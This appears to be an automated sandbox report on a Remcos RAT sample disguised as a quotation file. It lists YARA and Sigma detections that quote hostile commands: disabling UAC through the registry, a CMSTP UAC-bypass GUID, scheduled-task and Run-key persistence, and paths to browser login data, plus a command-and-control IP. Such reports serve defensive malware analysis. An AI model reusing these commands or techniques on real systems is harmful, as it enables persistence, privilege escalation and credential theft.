15.2.svchost.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
15.2.svchost.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
26.2.csc.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
26.2.csc.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
26.2.csc.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
26.2.csc.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
26.2.csc.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
45.2.ngen.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
45.2.ngen.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
45.2.ngen.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
45.2.ngen.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
45.2.ngen.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
45.2.ngen.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
45.2.ngen.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
45.2.ngen.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
45.2.ngen.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
45.2.ngen.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
15.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
15.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
15.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
15.2.svchost.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
15.2.svchost.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
11.2.svchost.exe.1e1edc9af50.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
11.2.svchost.exe.1e1edc9af50.1.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
11.2.svchost.exe.1e1edc9af50.1.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x690a8:$a1: Remcos restarted by watchdog! 0x69620:$a3: %02i:%02i:%02i:%03i
11.2.svchost.exe.1e1edc9af50.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x630fc:$str_a1: C:\Windows\System32\cmd.exe 0x63078:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63078:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63578:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63da8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6316c:$str_b2: Executing file: 0x641ec:$str_b3: GetDirectListeningPort 0x63b98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63d18:$str_b7: \update.vbs 0x63194:$str_b9: Downloaded file: 0x63180:$str_b10: Downloading file: 0x63224:$str_b12: Failed to upload file: 0x641b4:$str_b13: StartForward 0x641d4:$str_b14: StopForward 0x63c70:$str_b15: fso.DeleteFile " 0x63c04:$str_b16: On Error Resume Next 0x63ca0:$str_b17: fso.DeleteFolder " 0x63214:$str_b18: Uploaded file: 0x631d4:$str_b19: Unable to delete: 0x63c38:$str_b20: while fso.FileExists(" 0x636b1:$str_c0: [Firefox StoredLogins not found]
11.2.svchost.exe.1e1edc9af50.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62fe8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62f7c:$s1: CoGetObject 0x62f90:$s1: CoGetObject 0x62fac:$s1: CoGetObject 0x6cf38:$s1: CoGetObject 0x62f3c:$s2: Elevation:Administrator!new:
11.2.svchost.exe.1e1edc22508.2.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
11.2.svchost.exe.1e1edc22508.2.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
11.2.svchost.exe.1e1edc22508.2.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x690a8:$a1: Remcos restarted by watchdog! 0x69620:$a3: %02i:%02i:%02i:%03i
11.2.svchost.exe.1e1edc22508.2.unpack	REMCOS_RAT_variants	unknown	unknown	0x630fc:$str_a1: C:\Windows\System32\cmd.exe 0x63078:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63078:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63578:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63da8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6316c:$str_b2: Executing file: 0x641ec:$str_b3: GetDirectListeningPort 0x63b98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63d18:$str_b7: \update.vbs 0x63194:$str_b9: Downloaded file: 0x63180:$str_b10: Downloading file: 0x63224:$str_b12: Failed to upload file: 0x641b4:$str_b13: StartForward 0x641d4:$str_b14: StopForward 0x63c70:$str_b15: fso.DeleteFile " 0x63c04:$str_b16: On Error Resume Next 0x63ca0:$str_b17: fso.DeleteFolder " 0x63214:$str_b18: Uploaded file: 0x631d4:$str_b19: Unable to delete: 0x63c38:$str_b20: while fso.FileExists(" 0x636b1:$str_c0: [Firefox StoredLogins not found]
11.2.svchost.exe.1e1edc22508.2.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62fe8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62f7c:$s1: CoGetObject 0x62f90:$s1: CoGetObject 0x62fac:$s1: CoGetObject 0x6cf38:$s1: CoGetObject 0x62f3c:$s2: Elevation:Administrator!new:
26.2.csc.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
26.2.csc.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
26.2.csc.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
26.2.csc.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
26.2.csc.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
11.2.svchost.exe.1e1edc9af50.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
11.2.svchost.exe.1e1edc9af50.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
11.2.svchost.exe.1e1edc9af50.1.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
11.2.svchost.exe.1e1edc9af50.1.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
11.2.svchost.exe.1e1edc9af50.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
11.2.svchost.exe.1e1edc22508.2.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
11.2.svchost.exe.1e1edc22508.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
11.2.svchost.exe.1e1edc22508.2.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0xe34f0:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i 0xe3a68:$a3: %02i:%02i:%02i:%03i
11.2.svchost.exe.1e1edc22508.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0xdd430:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0xdd3c4:$s1: CoGetObject 0xdd3d8:$s1: CoGetObject 0xdd3f4:$s1: CoGetObject 0xe7380:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new: 0xdd384:$s2: Elevation:Administrator!new:
Click to see the 44 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\QUOTATION#30810.exe, ProcessId: 4508, TargetFilename: C:\Users\user\AppData\Roaming\svchost.exe

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION#30810.exe", ParentImage: C:\Users\user\Desktop\QUOTATION#30810.exe, ParentProcessId: 4508, ParentProcessName: QUOTATION#30810.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ProcessId: 6032, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: Suspect Svchost Activity

Source: Process started

Author: David Burkett, @signalblur: Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5708, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 5864, ProcessName: svchost.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5708, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 5864, ProcessName: svchost.exe

Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\Windows Mail\wab.exe", CommandLine: "C:\Program Files (x86)\Windows Mail\wab.exe", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Windows Mail\wab.exe, NewProcessName: C:\Program Files (x86)\Windows Mail\wab.exe, OriginalFileName: C:\Program Files (x86)\Windows Mail\wab.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 5864, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Program Files (x86)\Windows Mail\wab.exe", ProcessId: 6508, ProcessName: wab.exe

Sigma detected: Conhost Spawned By Uncommon Parent Process

Source: Process started

Author: Tim Rauch: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 5864, ParentProcessName: svchost.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 6192, ProcessName: conhost.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\svchost.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\QUOTATION#30810.exe, ProcessId: 4508, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , CommandLine: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6032, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , ProcessId: 2108, ProcessName: schtasks.exe

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpDAAA.tmp.bat"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1564, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 2772, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5708, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 5864, ProcessName: svchost.exe

Persistence and Installation Behavior

Sigma detected: Schedule system process

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION#30810.exe", ParentImage: C:\Users\user\Desktop\QUOTATION#30810.exe, ParentProcessId: 4508, ParentProcessName: QUOTATION#30810.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ProcessId: 6032, ProcessName: cmd.exe

Stealing of Sensitive Information

Sigma detected: Remcos

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, ProcessId: 4360, TargetFilename: C:\ProgramData\remcos\logs.dat

Snort Signatures

ET TROJAN Remcos 3.x Unencrypted Server Response - Source IP: 172.245.208.13 - Destination IP: 192.168.2.8

